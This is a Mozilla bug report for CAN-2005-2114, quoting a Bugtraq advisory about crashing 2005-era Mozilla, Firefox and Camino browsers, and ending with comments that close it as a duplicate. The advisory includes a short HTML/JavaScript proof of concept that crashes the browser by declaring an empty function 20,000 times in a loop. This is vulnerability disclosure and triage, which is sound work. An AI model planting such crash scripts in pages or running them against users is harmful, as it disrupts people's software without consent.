Closed
Bug 300955
Opened 20 years ago
Closed 20 years ago
CAN-2005-2114 javascript crash from calling an empty function
Categories
(Core :: JavaScript Engine, defect)
RESOLVED
DUPLICATE
of bug 299816
People
(Reporter: josh, Unassigned)
Details
A denial of service is possible via JavaScript that repeatedly calls an empty
function.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2114
has more information.
The URL link has a reproducer.
Here is the text which was posted to bugtraq:
Mozilla Multiple Product JavaScript Issue
http://www.kurczaba.com/html/security/0506241.htm
-------------------------------------------------
Vendor:
Mozilla (http://www.mozilla.org)
Vulnerable Software:
Mozilla 1.7.8
Firefox 1.0.4
Camino 0.8.4
Vulnerability/Exploit:
By using a specially crafted JavaScript function, it is possible to
crash the above named browsers. The script can be executed both with and
without user intervention.
Proof of Concept:
-----START of PoC-----
<html>
<head>
</head>
<body>
<script language="JavaScript">
//Run the function 20000 times
for (a = 0; a <= 20000; a++)
{
//Here is the special code that terminates the browser
function(){};
}
//Displays an alert to notify the user if the browser is not vulnerable.
alert("Good news - Your browser is not vulnerable.");
</script>
</body>
</html>
-----END of PoC-----
Proof of Concept (Online):
Manual: http://www.kurczaba.com/html/security/0506241_poc.htm
Automatic: http://www.kurczaba.com/html/security/0506241_poc2.htm
Workaround:
Disable JavaScript
Date Discovered:
June 14, 2005
Severity:
Low
Credit:
Paul Kurczaba
Comment 1•20 years ago
Josh, this has been known for a while, so of course dup'd a lot, now by you.
Can you say why you didn't find bug 299209?
/be
*** This bug has been marked as a duplicate of 299209 ***
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Note bug 299209 is marked private
*** This bug has been marked as a duplicate of 299816 ***
Status: VERIFIED → RESOLVED
Closed: 20 years ago → 20 years ago
*** This bug has been marked as a duplicate of 299816 ***
Status: REOPENED → RESOLVED
Closed: 20 years ago → 20 years ago
Resolution: --- → DUPLICATE